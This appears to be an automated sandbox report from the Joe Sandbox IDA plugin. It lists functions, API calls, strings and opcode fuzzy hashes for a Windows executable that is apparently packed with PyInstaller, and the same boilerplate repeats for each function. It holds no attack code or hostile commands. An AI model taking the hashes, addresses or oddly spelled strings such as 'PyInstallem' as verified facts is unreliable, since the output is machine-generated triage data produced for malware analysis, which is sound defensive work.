Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction ID: 39a2ec71ec57ee6a7575a7c26ea6f03ab38385a765142ef60c7f81ab0e44b88f
Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction Fuzzy Hash: BE219533A38A5186DB718F18E68037977A0FB84B54F244634EA5E8B6D9DF3FD4018B15

Function 00007FF6E60B04FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B0550

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: 39da6f089029c3ba16895b59ac063af7d1c2ad0565f9a8039dca51c4051cb0f2
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: 0E01C422A2876140EA15DF569A0036EA695FF95FE0F08C630DE6D97BDECE3FD5018309

Function 00007FF6E60B7AB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B7AEE

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
Instruction ID: e13a0a13b6823224e8d1fd6a82e98480370f59b420b4e4f35129743b48063093
Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
Instruction Fuzzy Hash: EE01C422E2D27340FEA26B6167403791990DF40390F148538E92DC2ACBDE2FE4514B0B

Function 00007FF6E60C0EBC Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60BDBBC: HeapAlloc.KERNEL32(?,?,?,00007FF6E60B0D24,?,?,?,00007FF6E60B2236,?,?,?,?,?,00007FF6E60B3829), ref: 00007FF6E60BDBFA

RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6E60C3AAB,?,?,?,00007FF6E60BA4E7,?,?,?,00007FF6E60BA3DD,?,?,?,00007FF6E60BA7BE), ref: 00007FF6E60C0F29

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Heap$AllocAllocate
String ID:
API String ID: 2177240990-0
Opcode ID: 1814f6a7f99628077e6790dcc214134e096980326a86c6b7395bc1920f775fdf
Instruction ID: 71cccd53435960e5ef1b44e20b6415ab6fb80e9351555573ef2dd7477713441d
Opcode Fuzzy Hash: 1814f6a7f99628077e6790dcc214134e096980326a86c6b7395bc1920f775fdf
Instruction Fuzzy Hash: C4016253E6C22784FE64AB6297407B901505F44BA0F088631DD2FCE6C6EE2FE541C22B

Function 00007FF6E60B7DEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B7E05

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: a32aaae194af85a2bb50d98e0fd6d4fb1d7db46f0bb83bbdb8857a87168204d2
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: E3E0EC66E2932642FA56BAA14B823BD15108F58341F44C830DA19CA2DBEE2F6C65572B

Function 00007FF6E60A83E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
Instruction ID: 86cc5cd3dcf647c0a50436001151240c2bb89d5854fffa007848cc117dfd6f22
Opcode Fuzzy Hash: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
Instruction Fuzzy Hash: CF418227D2C69581EA11DB24D6053FD2360FBA5784F54A332DF8D92193EF2AE6D8C305

Function 00007FF6E60BF158 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6E60BB9A6,?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02), ref: 00007FF6E60BF1AD

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction ID: fe83fd6e4daebfc5e5ef176b427a5ab8ab34a29e5d3929c409cbc6cfce5c7f76
Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction Fuzzy Hash: C8F06287B2A22681FE589661DB103B942915F48B40F4CEC30CD0ECB3C6DE1FE481822A

Function 00007FF6E60BDBBC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6E60B0D24,?,?,?,00007FF6E60B2236,?,?,?,?,?,00007FF6E60B3829), ref: 00007FF6E60BDBFA

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction ID: bb868a15249bf26ea5eb687064e239d608c5a3eac370552bc5baa83f665a794f
Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction Fuzzy Hash: 92F01213B3D27785FE5856615B417F592909F44764F188A30DD2ECA2CADE5FA480822B

Non-executed Functions

Function 00007FF6E60A6EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6E60A6F07
GetProcAddress.KERNEL32 ref: 00007FF6E60A6F46
GetProcAddress.KERNEL32 ref: 00007FF6E60A6F6B
GetProcAddress.KERNEL32 ref: 00007FF6E60A6F90
GetProcAddress.KERNEL32 ref: 00007FF6E60A6FB8
GetProcAddress.KERNEL32 ref: 00007FF6E60A6FE0
GetProcAddress.KERNEL32 ref: 00007FF6E60A7008
GetProcAddress.KERNEL32 ref: 00007FF6E60A7030
GetProcAddress.KERNEL32 ref: 00007FF6E60A7058

Strings

Tcl_GetString, xrefs: 00007FF6E60A7206
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF6E60A724A
Failed to get address for Tk_Init, xrefs: 00007FF6E60A73B2
Failed to get address for Tcl_EvalFile, xrefs: 00007FF6E60A72EA
Tcl_MutexLock, xrefs: 00007FF6E60A7076
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF6E60A729A
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF6E60A706A
Tcl_CreateInterp, xrefs: 00007FF6E60A6F3C
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF6E60A701A
Failed to get address for Tcl_CreateThread, xrefs: 00007FF6E60A7042
Tcl_DoOneEvent, xrefs: 00007FF6E60A6F86
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF6E60A6FF2
Tcl_MutexUnlock, xrefs: 00007FF6E60A709E
Tcl_GetObjResult, xrefs: 00007FF6E60A72A6
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF6E60A710A
Failed to get address for Tcl_Finalize, xrefs: 00007FF6E60A6FCA
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF6E60A6F58
GetProcAddress, xrefs: 00007FF6E60A6F20
Tcl_NewStringObj, xrefs: 00007FF6E60A722E
Tcl_DeleteInterp, xrefs: 00007FF6E60A6FFE
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF6E60A70BA
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF6E60A733A
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF6E60A6FA2
Failed to get address for Tcl_GetVar2, xrefs: 00007FF6E60A71AA
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF6E60A7182
Tcl_Finalize, xrefs: 00007FF6E60A6FAE
Tcl_CreateObjCommand, xrefs: 00007FF6E60A71DE
Tk_GetNumMainWindows, xrefs: 00007FF6E60A73BE
Tcl_ThreadQueueEvent, xrefs: 00007FF6E60A713E
Failed to get address for Tcl_EvalEx, xrefs: 00007FF6E60A7312
Tcl_EvalFile, xrefs: 00007FF6E60A72CE
Tcl_EvalObjv, xrefs: 00007FF6E60A731E
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF6E60A73DA
Failed to get address for Tcl_SetVar2, xrefs: 00007FF6E60A71D2
Tcl_SetVar2Ex, xrefs: 00007FF6E60A727E
Tcl_ConditionFinalize, xrefs: 00007FF6E60A70C6
Tcl_ThreadAlert, xrefs: 00007FF6E60A7166
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF6E60A70E2
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF6E60A71FA
Tcl_FindExecutable, xrefs: 00007FF6E60A6F61
Failed to get address for Tcl_Alloc, xrefs: 00007FF6E60A7362
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF6E60A7272
Tcl_EvalEx, xrefs: 00007FF6E60A72F6
Failed to get address for Tcl_MutexLock, xrefs: 00007FF6E60A7092
Failed to get address for Tcl_GetString, xrefs: 00007FF6E60A7222
Tcl_FinalizeThread, xrefs: 00007FF6E60A6FD6
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF6E60A72C2
Tcl_CreateThread, xrefs: 00007FF6E60A7026
Tcl_SetVar2, xrefs: 00007FF6E60A71B6
Tcl_GetCurrentThread, xrefs: 00007FF6E60A704E
Tcl_Init, xrefs: 00007FF6E60A6F00
Failed to get address for Tcl_Init, xrefs: 00007FF6E60A6F19
Tcl_NewByteArrayObj, xrefs: 00007FF6E60A7256
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF6E60A715A
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF6E60A6F7D
Tcl_ConditionNotify, xrefs: 00007FF6E60A70EE
Failed to get address for Tcl_Free, xrefs: 00007FF6E60A738A
Tk_Init, xrefs: 00007FF6E60A7396
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF6E60A7132
Tcl_Free, xrefs: 00007FF6E60A736E
Tcl_Alloc, xrefs: 00007FF6E60A7346
Tcl_GetVar2, xrefs: 00007FF6E60A718E
Tcl_ConditionWait, xrefs: 00007FF6E60A7116

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction ID: 3de832b2302b8cb4f55c8b6bb2d7fe7bdbf1e24bdc851d64f2b16c78cbf73714
Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction Fuzzy Hash: 24E1F967A7DB2391FA058B14AB503B467B1AF04781B945135C81E8A2A4FF7FB448C22F

Function 00007FF6E60A1F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF6E60A1F9E
MulDiv.KERNEL32 ref: 00007FF6E60A1FB2
MulDiv.KERNEL32 ref: 00007FF6E60A1FD3
SystemParametersInfoW.USER32 ref: 00007FF6E60A201B
CreateFontIndirectW.GDI32 ref: 00007FF6E60A202F
#380.COMCTL32 ref: 00007FF6E60A2053
CreateWindowExW.USER32 ref: 00007FF6E60A20A6
CreateWindowExW.USER32 ref: 00007FF6E60A2100
CreateWindowExW.USER32 ref: 00007FF6E60A215D
CreateWindowExW.USER32 ref: 00007FF6E60A21BF
SendMessageW.USER32 ref: 00007FF6E60A21DF
SendMessageW.USER32 ref: 00007FF6E60A21F9
SendMessageW.USER32 ref: 00007FF6E60A2218
SendMessageW.USER32 ref: 00007FF6E60A2237
SendMessageW.USER32 ref: 00007FF6E60A2255
SendMessageW.USER32 ref: 00007FF6E60A2273
SendMessageW.USER32 ref: 00007FF6E60A2291
SendMessageW.USER32 ref: 00007FF6E60A22A9
SendMessageW.USER32 ref: 00007FF6E60A22C1
GetClientRect.USER32 ref: 00007FF6E60A22D0

Part of subcall function 00007FF6E60A23F0: GetDC.USER32 ref: 00007FF6E60A241B
Part of subcall function 00007FF6E60A23F0: SelectObject.GDI32 ref: 00007FF6E60A2462
Part of subcall function 00007FF6E60A23F0: DrawTextW.USER32 ref: 00007FF6E60A2485
Part of subcall function 00007FF6E60A23F0: SelectObject.GDI32 ref: 00007FF6E60A249B
Part of subcall function 00007FF6E60A23F0: ReleaseDC.USER32 ref: 00007FF6E60A24AB
Part of subcall function 00007FF6E60A23F0: MoveWindow.USER32 ref: 00007FF6E60A24FB
Part of subcall function 00007FF6E60A23F0: MoveWindow.USER32 ref: 00007FF6E60A253B
Part of subcall function 00007FF6E60A23F0: MoveWindow.USER32 ref: 00007FF6E60A258E

Strings

STATIC, xrefs: 00007FF6E60A205C, 00007FF6E60A20B1
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF6E60A1F7D
BUTTON, xrefs: 00007FF6E60A2176
EDIT, xrefs: 00007FF6E60A210B
Close, xrefs: 00007FF6E60A2168

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: d86d6e0cbc78f1b943150f519088be2f0ae244d9354dbd7fe95dc569254f024f
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 02A18937628B9587E3148F11E69479EB364F788B84F604129EB9E47B24CF7EE164CB00

Function 00007FF6E60C471C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6E60C476A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C4DD6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C4F4C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C520A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C542A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5667
memcpy_s.LIBCPMT ref: 00007FF6E60C5742
memcpy_s.LIBCPMT ref: 00007FF6E60C57ED
memcpy_s.LIBCPMT ref: 00007FF6E60C58BC

Strings

1#QNAN, xrefs: 00007FF6E60C4883
1#INF, xrefs: 00007FF6E60C4893
1#IND, xrefs: 00007FF6E60C4857
1#SNAN, xrefs: 00007FF6E60C487A

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction ID: 01a2c4868f33fba3812f2e4208f5847a26f8a5c5a18e21b5833b5ea373ae9cb0
Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction Fuzzy Hash: C9B21673A282A28BE725CF64D6407FD37A1FB44398F401135DA0E9BA85DF3BA900CB55

Function 00007FF6E60A8560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF6E60A2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8587
FormatMessageW.KERNEL32 ref: 00007FF6E60A85B6
WideCharToMultiByte.KERNEL32 ref: 00007FF6E60A860C

Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF6E60A8616
No error messages generated., xrefs: 00007FF6E60A85C0
PyInstallem: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF6E60A8629
FormatMessageW, xrefs: 00007FF6E60A85C7
PyInstallem: FormatMessageW failed., xrefs: 00007FF6E60A85D3
WideCharToMultiByte, xrefs: 00007FF6E60A861D

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-3505189403
Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction ID: 0a32843e1ef2c168964c86ba2ef49b896dcaf65db5a2977d7e7270ecae7af24d
Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction Fuzzy Hash: A0218072A28A5282F720DB15EA9436A63A0FF883D4F840135E54ED76E4DF3FD145CB1A

Function 00007FF6E60AC57C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6E60AC598
RtlCaptureContext.KERNEL32 ref: 00007FF6E60AC5C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6E60AC5DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6E60AC620
IsDebuggerPresent.KERNEL32 ref: 00007FF6E60AC674
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6E60AC695
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6E60AC6A0

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

